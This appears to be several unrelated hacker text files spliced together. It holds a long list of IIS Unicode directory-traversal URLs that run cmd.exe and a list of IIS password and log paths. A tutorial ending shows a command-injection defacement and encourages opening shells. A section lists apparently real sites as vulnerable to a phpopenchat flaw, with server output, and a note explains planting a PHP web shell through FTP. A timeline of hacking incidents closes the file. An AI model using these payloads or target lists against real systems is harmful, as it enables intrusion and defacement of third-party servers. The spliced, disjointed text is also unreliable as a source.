/cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/cgi-bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/exchange/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/msadc/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/msadc/..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/msadc/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/msadc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/msadc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/PBServer/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/PBServer/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/PBServer/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/PBServer/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/Rpc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/Rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/Rpc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/Rpc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/Rpc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/samples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir

/samples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir

/script/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/script/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/script/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/script/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir

/scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\

/scripts/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c%20dir%20C:\

[/IIS-UNICODE]

[IIS-DECODE]

[/IIS-DECODE]

[IIS-UTFCODE]

[/IIS-UTFCODE]

[CGI-LIST]

[WINNT]
[/WINNT]

[UNIX]
[/UNIX]

[COMMON]
[/COMMON]
----------
----------

/_vti_log/author.log
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_private/form_results.txt
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/log/access.log
/logs/access.log
/msadc/Samples/SELECTOR/showcode.asp
/msads/Samples/SELECTOR/showcode.asp



-------------------------------------------------------------------------------------
6 - Don't be an SC

SC = Script Kiddie

Many people have been using vulns of the kind I covered in this txt for ridiculous acts, such as
echoing into an index, defacing for no reason and saying they're the best, etc. etc.

> www.target.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=|echo Eu soh hacko > index.html|

This is considered a script kiddie act, and I share that opinion, because you should use
this "attack via strings" technique for more exciting things, to open a shell, poke around
in the server, etc. etc.
And if you're going to deface, at least let it be for some reason and with a nice-looking index too... ;)



-------------------------------------------------------------------------------------
7 - Wrapping up

Don't cry, but the txt is over... ;(

Seriously now, this txt was VEEERY simple; I only wrote it because lots of people were
defacing and saying they were the best and so on... lol so I got a little angry at these kids...
Poor things!! Now when you see a lame deface out there, and the guy is some kind of idiot and
wants to come play the big shot, you can already imagine how he did the deface, right? ;)

With this txt I also hope, besides unmasking the kids of Brazil, to show an easy way
to open a shell on a server, thus increasing the number of tinkerers in Brazil.. ;)

I'm heading off now, since it's 1 in the morning, I'm sleepy and I have to work tomorrow.. DAMN.. hehe

But don't be like that, I'm already thinking of some other topic for the
next txt, and please, if you have any idea for a cool topic you would like to see
on the hax0rs lab site (www.hax0rslab.org), send me a mail > f0ul@hax0rslab.org

Because writing is easy; choosing the topic is the problem!!

See you...

Linux Penguin.

http://www.0xdeadbeef.info/stuff/linux_penguin.html

http://www.0xdeadbeef.info/

Choose Windows. Choose the eXPerience.
Choose flashy menus on your fucking server.
Choose Exchange. Choose IIS.
Choose Code Red, Nimda, the Lovebug, and a sexy Melissa...
Choose Outlook and end up wondering where your stupid .docs are.
Choose not to choose. Let Micro$oft do it for you.

But why would I want to do a thing like that?

I choose not to be chosen: I choose something else.
The reasons? There are too many reasons.
And who needs reasons when you've got Linux?

(from http://p.ulh.as/)

phpopenchat

Vuln: phpopenchat

A vuln that is not yet very public, and even those who know it exists often don't know how to find vulnerable sites.

Example of a vulnerable site: chat.grupoextra.com/index.php?language=it

Appending your string to the vulnerable host ... /include/adodb/tests/tmssql.php?do=phpinfo

Vuln: http://chat.grupoextra.com/include/adodb/tests/tmssql.php?do=phpinfo
Linux IPDAER0572MIA.usa.prod.interland.net 2.4.21-40.EL #1 Thu Feb 2 22:32:00 EST 2006 i686

Vulnerable examples:

http://194.95.255.152/phpopenchat/include/adodb/tests/tmssql.php?do=
Linux william2 2.6.8-24-default #1 Wed Oct 6 09:16:23 UTC 2004 i686

http://www.ghostpix.com/phpopenchat/include/adodb/tests/tmssql.php?do=
Linux ns2.digitalnameserver.com 2.4.20-28.9 #1 Thu Dec 18 13:45:22 EST 2003 i686

http://english.eb.hc.edu.tw/phpopenchat/include/adodb/tests/tmssql.php?do=
Linux content 2.4.20-8smp #1 SMP Thu Mar 13 17:45:54 EST 2003 i686

include : Anissina_Keiko f0r null

Xt0rti0n-Team.


lol

Root Stuff 2.

all the exploits have at their base the convenience of the admins, or stupidity, it depends, so ..
the ssh "remote exploit" isn't an exploit at all; it is just a scanner that searches for open ports (22 in this case) and tries some users and passwords
in case you have a nologin, some ftp daemons use that for anonymous users, so ...
IF the victim has an apache server up and running with the default settings, you can use the nologin to connect to ftp and put a php script called phpshell there, then connect to the apache server at h t t p://ip/user~ ; apache will then search for the right user in /home/ftp, and if that dir is there (usually it is) the php script will display a zh shell in that webpage with chown equal to the ftp daemon's
from here i think you all know what you have to do

hope i explained it well )

ps: it is an old method; i didn't test whether it still works on the new linux/kernels, but i don't think they changed it too much

list of computer hacker incidents

1961.01.02 Caltech hackers (Fiendish Fourteen) hacked the stunt cards at the Rose Bowl (U of Wash vs Minnesota)
to say CALTECH instead of WASHINGTON and show a beaver instead of a husky
1971.00.00 John Draper (Cap'n Crunch) uses whistle (blue box) to access Ma Bell
1972.05.00 John Draper arrested for phone fraud
1981.00.00 Kevin Mitnick broke into the records of LA Unified School District, Monroe HS
1981.00.00 Captain Zap (Ian Murphy) breaks into AT&T and changed the internal clocks; cracked White House switchboard
1st person convicted of a computer crime; inspired the movie "Sneakers"
1981.05.30 Mitnick gets into Pac Bell's COSMOS phone center; takes passwords
1982.00.00 Chaos Computer Club founded
1982.00.00 Mitnick (Condor) cracks Pacific Telephone system and TRW; destroys data
1982.00.00 414 Gang raided; 6 teenagers arrested for breaking into Los Alamos National Lab and cancer center
1982.11.20 MIT hacked the Harvard-Yale football game with a black ball that had MIT written on it
1983.00.00 Mitnick arrested for gaining illegal access to the ARPAnet & Pentagon
1983.11.00 Fred Cohen creates the first virus at U of Southern California (Vax virus called VD); coined "computer virus"
1984.00.00 Kevin Poulsen (Dark Dante) arrested for breaking into the ARPAnet
1984.00.00 2600 hacker magazine begins regular publication by Emmanuel Goldstein (Eric Corley)
1985.00.00 First issue of Phrack magazine
1986.00.00 Chaos Computer Club cracks German government computer that had info about Chernobyl
1986.01.00 Pakistani Brain virus released; oldest malicious virus; affected the boot sector
1986.08.00 Dr Cliff Stoll tracks hackers (Chaos Computer Club) using Lawrence Berkeley Labs computers
1986.09.16 hackers break into Stanford Unix computers
1986.00.00 Congress enacts the Federal Computer Fraud and Abuse Act; illegal to access unauthorized federal computers
1987.07.05 hackers got secret access codes from Sprint
1987.09.18 hacker accesses AT&T computers, stealing $1 million worth of s/w
1987.09.28 hackers from Brooklyn penetrate MILNET
1987.10.15 Jerusalem memory resident virus; 1st file-infecting virus
1987.11.15 Lehigh virus; infected the command.com
1987.11.23 Chaos Computer Club hacks NASA's SPAN network (VMS 4.4)
1987.12.25 Christmas virus; 1st WAN virus; draws a Christmas tree on the screen while looking for network users
1987.12.00 Mitnick sentenced for stealing s/w from SCO
1988.06.15 Mac/Scores virus infected Macintosh 6.0.4
1988.09.00 "Prophet" cracks BellSouth AIMSX computer network
1988.11.02 Internet worm sent out by Robert T. Morris; overflowed fingerd buffer; 6,000 computers (Sun 3) affected
1st Internet worm; crashed 6,000 computers
1988.11.23 hacker cracks USAF Sperry 1160 computer in San Antonio
1988.12.16 Mitnick cracks MCI DEC network, steals VMS source code and XSafe
1989.00.00 Avenger written by Dark Avenger overwrites data onto a system's hard drive
1989.00.00 WDEF Mac virus corrupts hard drive and desktop files
1989.06.21 hacker cracks USAF satellite-positioning satellite
1989.07.22 Fry Guy cracks into McDonald's mainframe; also stole credit cards
1989.10.16 WANK (Worms Against Nuclear Killers) worm attacked SPAN (NASA DECnet) VAX/VMS systems
1989.12.15 30 viruses discovered
1990.00.00 Kevin Poulsen (Dark Dante) breaks into Pac Bell to be the 102nd caller on LA radio station; wins Porsche
1990.00.00 Legion of Doom (LOD) and Masters of Deception are rival hacker groups
1990.00.00 Lamprecht (Minor Threat) cracks into warez site; writes ToneLoc
1990.00.00 Frank Darden, Adam Grant, Bob Riggs, all of LOD arrested for cracking into BellSouth
1990.03.07 Denver hacker cracks NASA computer at Huntsville and Greenbelt
1990.03.21 hacker cracks Cliff Stoll's computer and adds message
1990.04.00 hackers from Netherlands penetrated DoD sites
1990.10.15 hackers break into British clearing banks
1991.00.00 Michelangelo virus; goes off on March 6
1991.01.00 Lamprecht (Minor Threat) hacks into Southwestern Bell; wrote ToneLoc
1991.03.00 hacker penetrates NASA, NIH, Bureau of Land Mgt, BBN
1991.04.21 Dutch hackers from Eindhoven break into US military computers
1991.06.21 Kevin Poulsen arrested for breaking into Pacific Bell phones
1991.07.00 Justin Petersen (Agent Steal) arrested for hacking into a bank's computer and transferring funds
1991.09.00 Justin Petersen released from prison to help FBI track crackers
1991.12.31 1,000 viruses exist in the wild
1992.00.00 Dallas computer maker discovers planted network sniffer on computer fax machine
1992.00.00 hackers get root at Eindhoven U of Technology in the Netherlands
1992.00.00 Morty Rosenfeld convicted after hacking into TRW, stealing 176 credit card reports and numbers
1992.02.00 Lamprecht (Minor Threat) steals circuit boards
1992.03.06 Michelangelo virus
1992.07.00 Lamprecht is caught attempting to sell stolen microprocessors
1992.11.00 Mitnick cracks into California Dept of Motor Vehicles
1992.12.00 hacker arrested for penetrating NASA, NIH, BBN, etc
1993.00.00 Masters of Deception (MOD) phone phreakers busted via wiretaps
1993.00.00 food scientist gained access to General Mills mainframe computers
1993.08.00 Justin Petersen (Agent Steal) arrested for computer fraud; broke into financial services company
1993.10.28 Randal Schwartz uses Crack at Intel to crack passwords
1994.00.00 Mark Abene (Phiber Optik) jailed for phone tampering
1994.02.00 hacker installs network sniffer and grabbed 100,000 names and passwords
1994.02.00 Texas Racing Commission computer hacked into
1994.02.01 hacker spoofed a Dartmouth professor using email to cancel tests
1994.03.23 DataStream Cowboy (Richard Pryce, age 16) broke into Rome Lab, Griffiss AFB from UK; used sniffer
1994.06.13 Citibank hacked by Vladimir Levin; $12 million in illegal transfers
1994.07.14 French student Damien Doligez cracks 40-bit RC4 encryption
1994.07.21 hackers crack into the Pentagon, altering and erasing records
1994.08.00 Justin Petersen electronically steals $150k from Heller Financial
1994.09.00 Netcom's credit card database was on-line and accessible to the unauthorized
1994.10.00 Michael Smyth, a regional manager at Pillsbury, fired due to intercepted email
1994.10.12 computer engineer cracks Marks & Spencer security file containing PIN numbers
1994.11.01 hacker cracks FBI's conference-calling system; made $250,000 in calls
1994.12.00 US Naval Academy computer system hacked; sniffer programs installed
1994.12.00 authors were targets of electronic mail bomb
1994.12.00 CrackBuster issued cancels for every message in alt.2600; flooded groups
1994.12.25 Mitnick cracks into Tsutomu Shimomura's security computers; stole s/w tools
1995.01.00 Chris Lamprecht (Minor Threat) incarcerated for hacking; banned from Internet
1995.01.27 Mitnick cracks into the Well; puts Shimomura's files there and Netcom credit card numbers
1995.02.15 Mitnick captured; broke into NORAD, PacBell, CA DMV, etc; had 20,000 credit card numbers
1995.04.00 Journalist David Pogue's AOL account deleted by hackers
1995.04.05 SATAN security tool released to the Internet
1995.05.05 Chris Lamprecht (Minor Threat) becomes 1st person banned from Internet
1995.06.02 hackers using Vanderbilt computers hack Air Force site - caught
1995.07.00 crackers tapped into Navy computer system and gained access to French and Allied data
1995.07.00 Julio Ardita of Argentina cracked into US military computers, Harvard, NASA
1995.07.25 Randal L Schwartz convicted of hacking under Oregon's Computer Crime Law
1995.07.28 hacker from Calgary freenet uses sendmail attack on gov sites
1995.08.04 hacker cracked NY Times Internet service, bringing it down
1995.08.15 several hackers crack Netscape 40-bit SSL; Damien Doligez used 120 computers
1995.09.11 Golle Cushing (Alpha Bits) arrested for selling credit card and cell phone info
1995.09.16 Berkeley students cracked Tower Records/Video computers; $20,000 charged
1995.09.17 Hackers discover weakness in Netscape random number generator; SSL cracked
1995.10.23 1st court-ordered wiretap on a computer network; at Harvard
1995.11.00 buffer overflow in Netscape Navigator host name made it vulnerable
1995.12.20 NASA Ames Research Center home page hacked
1995.12.28 Julio Ardita arrested in Argentina for hacking into Harvard
1996.00.00 Concept virus is 1st macro to affect Macs and PCs
1996.01.01 1st court authorized wiretap of an ISP; cell-fraud thru Compuserve
1996.01.15 Swedish computer hacker hacks into 911 phone system in FL
1996.01.22 Chaos taps cleartext transmission of banking information
1996.01.25 Russian pleads guilty of participating in Citibank wire fraud
1996.01.29 Digital Planet's web site for MGM/UA's "Hackers" Site hacked
1996.02.15 Hackers altered UK talking bus stops for use to the blind
1996.02.27 BerkshireNet in MA hacked; data erased and system shut down
1996.03.05 whitehouse.gov flooded with forged email; denial of service
1996.03.06 Boston ISPs hacked by U4ea; deleted Boston Globe web pages
1996.03.17 Telia, Sweden's biggest ISP, home page hacked
1996.04.05 N00gz indicted for computer fraud; accessed Bell, Sprint, SRI
1996.04.19 NYPD voice-mail system hacked
1996.04.27 Cambridge U hacked; confidential files broken into
1996.05.15 Datastream Cowboy from UK arrested for breaking into Rome Labs
1996.06.15 Two UK hackers charged with intruding into Lockheed computers
1996.06.20 14-year old arrested for using fraudulent credit card numbers
1996.06.25 hackers penetrate the public library network of a state
1996.07.05 1st known Excel virus, Laroux
1996.07.09 Ontario group gets into computers at a base in VA
1996.07.10 HS students crack a drink manufacturer's computer voice-mail system
1996.07.31 Tim Lloyd plants s/w time bomb at Omega Engineering in NJ; 1st federal computer sabotage case
1996.08.00 Fort Bragg soldier compromised military computer system; distributed passwords
1996.08.04 US hackers crack computers of the European parliament and commission
1996.08.16 Department of Justice home page hacked at www.usdoj.gov
1996.08.25 American Psychoanalytic Association hacked
1996.08.29 Nation of Islam web page hacked
1996.08.30 British Conservative Party webpage hacked
1996.09.00 Helsingius closes penet.fi anonymous remailer; Finnish police wants Scientology user
1996.09.06 hackers shut down PANIX, New York's Public Access Networks; SYN attack
1996.09.17 computer files with names of 4,000 AIDS patients taken in Florida
1996.09.18 CIA home page (www.odci.gov/cia) hacked by 5 Swedish hackers
1996.09.18 Internet Chess Club hit by hacker attack
1996.09.19 hacker cracks Palisades, NJ school system
1996.09.20 cancelbot attacks Usenet; 25,000 messages wiped out
1996.09.25 Kevin Mitnick indicted for damaging computers at USC, stealing s/w
1996.10.05 Wazzu virus released
1996.10.15 disgruntled employee wipes out all computer files at Digital Technologies Group
1996.10.22 hackers crack Czech banks; steal $2 million
1996.10.23 Fort Bragg, NC paratrooper hacked U.S. Army systems and gave passwords to China
1996.10.25 Florida Supreme Court home page hacked
1996.11.05 hackers attack anti-military site (www.insigniausa.com); erased files
1996.11.08 NY Times web site hit by SYN-flood attack; DoS
1996.11.10 Latin Summer Meeting home page hacked; porno and satire added
1996.11.12 Kriegsman furs web page hacked by animal rights activist; used phf hack
1996.11.17 hackers removed songs from computers at U2's Dublin studio
1996.11.21 Danish Research group get into computers at TX base
1996.11.22 NY city workers falsified computer records in largest tax fraud in NY
1996.11.26 Web site that provided news about Belarus leader was destroyed
1996.11.27 Nethosting and 1500 client home pages hacked
1996.11.29 Disgruntled computer technician brings down Reuters trading net in Hong Kong
1996.12.06 England's Labour Party web site hacked
1996.12.14 hackers attack WebCom, knocking out 3,000 web sites; used SYN-flood
1996.12.16 hackers crack Yale School of Medicine web page with the phf hack
1996.12.16 NASA home page hacked (Goddard); hack has both frames and JavaScript
1996.12.20 6 Danish hackers sentenced for attacking Pentagon computers
1996.12.23 Zhangyi Liu arrested in Dayton for cracking into WPAFB computers; had passwords
1996.12.29 Air Force home page hacked at DTIC; DefenseLINK shut down
1996.12.30 NASA home page hacked again by StOrM
1997.01.06 Croatians intrude into computers at Anderson AFB, Guam
1997.01.08 hacker crashed California state agency computer - Legal Employment Network
1997.01.13 Crack dot Com hacked; Doom, Quake, Golgotha source code downloaded
1997.01.15 hacker sentenced to prison for reprogramming Taco Bell computers
1997.01.17 Government of Victoria, Australia home page hacked
1997.01.29 phf hack from Belgium to TX base
1997.02.03 hackers spoof Eastern Avionics web page to grab credit card numbers
1997.02.05 German Chaos group uses ActiveX and Quicken to withdraw money
1997.02.07 Planned Parenthood stops use of plannedparenthood.com domain name
1997.02.10 Indonesia's Dept of Foreign Affairs homepage hacked
1997.02.15 AOL Court TV site with news on OJ Simpson trial hacked
1997.03.03 Loran International hit by a denial of service attack
1997.03.05 NASA homepage hacked
1997.03.09 NCAA WWW site hacked; pages changed by 14-year old
1997.03.12 IP floods of SMTP causes DoS at base in VA
1997.03.16 The Well hit by hackers. Passwords stolen, files deleted, trojans planted
1997.03.19 Spammer Cyber Promotions suffers hack attack
1997.04.00 internal hacker crashed Forbes Inc computer system; used "time bomb" and had passwords
1997.04.01 Malaysia's national telecommunications company home page hacked
1997.04.05 NASA web site hacked
1997.04.15 San Antonio's Express News web site server system hacked
1997.04.17 Cyber Promotions broken into, web page altered, password file stolen
1997.04.21 hacker provokes AOL to shut down Klan site
1997.04.26 Amnesty International homepage hacked
1997.04.27 British Conservative Party got hacked
1997.05.15 hacker floods NASA communications to Atlantis Shuttle/Mir mission; delays transmission
1997.05.23 Carlos Salgado grabs 100,000 credit card numbers from San Diego; used a sniffer
1997.05.27 The Lost World Jurassic Park homepage hacked
1997.05.29 hacker hit LAPD
1997.06.00 Netcom voice-mail hacked by "Mr Nobody"
1997.06.03 Delaware law enforcement officers get teenager cracking NASA
1997.06.11 USDA site hacked
1997.06.16 pro-spam hacker reported
1997.06.18 hackers in CO crack RSA's 56-bit DES encryption
1997.06.20 hackers caused denial of service to Microsoft's NT IIS web server
1997.06.25 Geocities frontpage got hacked
1997.06.30 hackers cause DoS on Microsoft NT server with header packets
1997.07.11 ESPN and nba.com (starwave) shut down after hacker emails shoppers credit info
1997.07.14 Danish computer guy finds hole in Netscape; asks for big reward money
1997.07.15 Canadian Security Intelligence Service got hacked
1997.07.18 hackers attack Swedish Crack-a-Mac site
1997.07.18 hackers attack MacInTouch - SYN flood
1997.08.01 Long Island group added a Trojan horse to hijack users' modem
1997.08.08 George Mason Univ students hacked their way into the Univ computers
1997.08.10 Cyber Promotions servers hacked
1997.08.16 Experian (TRW credit bureau) Internet allowed wrong credit reports
1997.08.18 Crack a Mac front page got hacked at hacke.infinit.se
1997.09.01 Altavista homepage got hacked (altavista.com)
1997.09.15 hackers hit coca-cola web site
1997.09.24 lince.com NT server got hacked
1997.09.25 Florida State School of Criminology NT server got hacked
1997.09.26 sterlingcorp.com NT server got hacked
1997.09.26 US Geological Survey NT server got hacked
1997.09.27 methodisthealth.com NT server got hacked
1997.09.30 ValuJet homepage got hacked
1997.10.01 hacker spoofs SANS Security Digest newsletter; hacks into ClarkNet ISP
1997.10.05 hackers get into www.pentagon-ai.army.mil home page
1997.10.06 hacker breaks into Japan's Nippon Telegraph and Telephone (NTT)
1997.10.14 Yale e-mail account servers hacked; sniffer used
1997.10.19 RSA's RC5 56-bit encryption key cracked by Bovine effort
1997.10.31 Eugene Kashpureff arrested; redirected the NSI web page to his Alternic
1997.11.10 dragonserve.com hacked in Hong Kong
1997.11.11 DIU homepage hacked Claire Danes
1997.11.14 Spice Girls website hacked CodeZero
1997.11.15 China's Agricultural University hacked; condemned nuke tests
1997.11.21 Springfield College hacked Mr 9X (GM 288)
1997.11.23 SyMark Software hacked properstuff
1997.11.28 Local 2609 hacked Magica de Bin
1997.12.01 Secure Network Systems hacked Magica de Bin
1997.12.02 CA Dept of Fish and Game hacked
1997.12.04 e-mail bomb threat sent to Goodyear Tire store in WI Newman, Chad
1997.12.05 Fastcomm Australasia hacked Magica de Oct
1997.12.05 tourne.com hacked Claire Danes
1997.12.05 University of Technology, Sydney physics server hacked Magica
1997.12.06 five commercial sites hacked KAOS 97
1997.12.07 British Field Sports Society hacked Atrocity
1997.12.08 www.yahoo.com hacked pantz; h4gis
1997.12.09 Plumas Sierra, CA ISP hacked 404
1997.12.10 John Reilly signs hacked CyberToast
1997.12.10 OR Dept of Forestry website hacked CyberToast
1997.12.10 OneTouch, Inc hacked Claire Danes
1997.12.11 FOX network hacked; page pointed to NBC
1997.12.11 NetAdv hacked The Bookie
1997.12.11 HQ USAF homepage hacked; files renamed
1997.12.13 www.centerfold-aa.org hacked CyberToast
1997.12.13 Stanford homepage hacked
1997.12.13 35 sites hacked by the Legions of the Underground L.O.U.
1997.12.13 several com sites hacked CyberToast
1997.12.14 at least 7 com sites hacked newport
1997.12.14 Sarah Lawrence College and Diversified Data Systems hacked Claire Danes
1997.12.15 money shifted from 208 German bank accounts; security codes changed
1997.12.18 NetTime in Sweden hacked
1997.12.21 Progressive Woman website hacked properstuff
1997.12.21 Netstar in UK hacked KAOS 97
1997.12.21 Acura car dealership web site hacked properstuff
1997.12.21 Sierra On-Line games hacked
1997.12.22 Moody AFB homepage hacked
1997.12.22 ATEC software and www.ingmar.com hacked KAOS 97
1997.12.23 www.mpm.it homepage hacked
1997.12.25 www.lancasterhome.com hacked Claire Danes
1997.12.25 Rand J Trading homepage hacked StarCracker
1997.12.25 Net 4 Christ hacked newport
1997.12.26 U of Montreal Biomedical homepage hacked
1997.12.27 excelsior.arc.nasa.gov hacked Claire Danes
1997.12.29 several TV and radio websites hacked L.O.U.
1997.12.29 Taiwan web site hacked; bad ws_ftp files and password files
1997.12.30 First National Bank, Brookings, SD web site hacked
1997.12.30 www.k9breeders.com web site hacked
1997.12.31 Craig Enterprises hacked FTH
1997.12.31 at least 18 com and org sites hacked inhale
1997.12.31 18 com and net sites hacked newport
1997.12.31 Datatech Consulting, Sweden hacked 414
1997.12.31 China's Agricultural University hacked; FreeTibet Now
1998.02.19 Virginia schools hacked (Rockbridge)
1998.01.01 command to check passwords; went worldwide Abene, Mark
1998.01.01 Quake web site hacked porno
1998.01.02 Janet Jackson and Rolling Stones web site hacked CodeZero
1998.01.02 BMW web site hacked
1998.01.03 Rapid City, SD ISP hacked
1998.01.03 www.hartnet.org hacked
1998.01.03 Association of Optometrists web site hacked OG (Older Generation)
1998.01.03 Marin, CA school hacked OptikLenz
1998.01.03 U of Costa Rica homepage hacked TikoZ
1998.01.03 Bolling AFB and Davis-Monthan AFB homepage hacked CodeZero
1998.01.04 Andorra NIC hacked
1998.01.04 Taiwan web site hacked; bad ws_ftp files and password files
1998.01.05 Sakura Japanese bank database broken into - customer data stolen Fujisawa
1998.01.05 TX A&M homepage hacked
1998.01.07 UNICEF homepage hacked
1998.01.07 Philips Communication hacked OptikLenz
1998.01.07 WV Network for Educational Telecomputing hacked OptikLenz
1998.01.08 Bureau of Labor Statistics flooded with fake info requests; shut down
1998.01.08 MD Board of Education hacked; files and payroll altered
1998.01.09 www.webbnet.com hacked Magica de Bin
1998.01.09 Gladsaxe Kommune, Denmark hacked Magica de Bin
1998.01.09 noemie.informatics.sintef.no hacked Virtus
1998.01.09 T/R systems hacked Virtus
1998.01.09 www.d-lab.com.ar (Argentina) hacked klan of dark afros
